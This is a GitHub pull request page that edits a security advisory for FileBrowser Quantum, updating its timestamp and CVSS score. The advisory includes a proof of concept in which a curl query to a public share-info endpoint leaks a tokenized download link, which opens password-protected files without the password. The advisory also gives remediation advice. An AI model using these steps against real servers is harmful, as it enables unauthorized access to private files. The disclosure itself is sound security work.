Skip to content

[GHSA-525j-95gf-766f] FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info #7352

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
ByteAfterlife wants to merge 1 commit into
base: ByteAfterlife/advisory-improvement-7352
Choose a base branch
from
+3 −3
Open

[GHSA-525j-95gf-766f] FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info #7352

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 3 additions & 3 deletions advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-525j-95gf-766f",
"modified": "2026-03-18T18:31:13Z",
"modified": "2026-03-18T18:32:15Z",
"published": "2026-03-09T19:48:12Z",
"aliases": [
"CVE-2026-30933"
Expand All @@ -10,8 +10,8 @@
"details": "### Summary\nThe remediation for CVE-2026-27611 appears incomplete. Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2. \n\n\n### Details\nThe issue stems from two flaws:\n1. Tokenized download URLs are written into the persistent share model\n```\nbackend/http/share.go\nconvertToFrontendShareResponse(line 63)\ns.DownloadURL = getShareURL(r, s.Hash, true, s.Token)\n```\n2. The public endpoint:\n```\nGET /public/api/share/info\nreturns shareLink.CommonShare without clearing DownloadURL.\n```\n\nSince Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.\n\nThe previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL\n\n\n### PoC\n1. Create a password protected share as an authenticated user \n\n2. Copy the public share URL (the clipboard WITHOUT an arrow) \n `http://yourdomain/public/share/yoursharedhash` \n Example: \n `http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw` \n\n3. Query the public share endpoint via curl request: \n`curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*' ` \nExample: \n`curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*' ` \n \n Response includes:\n ```\n {\n \"shareTheme\": \"default\",\n \"title\": \"Shared files - test.md\",\n \"description\": \"A share has been sent to you to view or download.\",\n \"disableSidebar\": false,\n \"downloadURL\": \"http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D\",\n \"shareURL\": \"http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw\",\n \"enforceDarkLightMode\": \"default\",\n \"viewMode\": \"normal\",\n \"shareType\": \"normal\",\n \"sidebarLinks\": [\n {\n \"name\": \"Share QR Code and Info\",\n \"category\": \"shareInfo\",\n \"target\": \"#\",\n \"icon\": \"qr_code\"\n },\n {\n \"name\": \"Download\",\n \"category\": \"download\",\n \"target\": \"#\",\n \"icon\": \"download\"\n },\n {\n \"name\": \"sourceLocation\",\n \"category\": \"custom\",\n \"target\": \"/srv/test.md\",\n \"icon\": \"\"\n }\n ],\n \"hasPassword\": true,\n \"disableLoginOption\": false,\n \"sourceURL\": \"/srv/test.md\"\n }\n ```\nNote the response \"hasPassword\": true and downloadURL includes token= parameter\n\n\n4. Take the downloadURL(seen in json data response) and replace \\u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering \nExample:\n`http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D`\n\nBrowser downloads file immediately without requiring password\n\n### Impact \nAn unauthenticated attacker can retrieve password protected shared files without the password.\nResults in authentication bypass, unauthorized file access and confidentiality compromise\n\n### Recommended Remediation\nSanitize DownloadURL in public share info responses via `commonShare.DownloadURL = \"\"` before returning the json response in shareInfoHandler method located in backend/share.go\n\nStructural fix, only generate tokenized URLs after successful password validation",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
}
],
"affected": [
Expand Down
Loading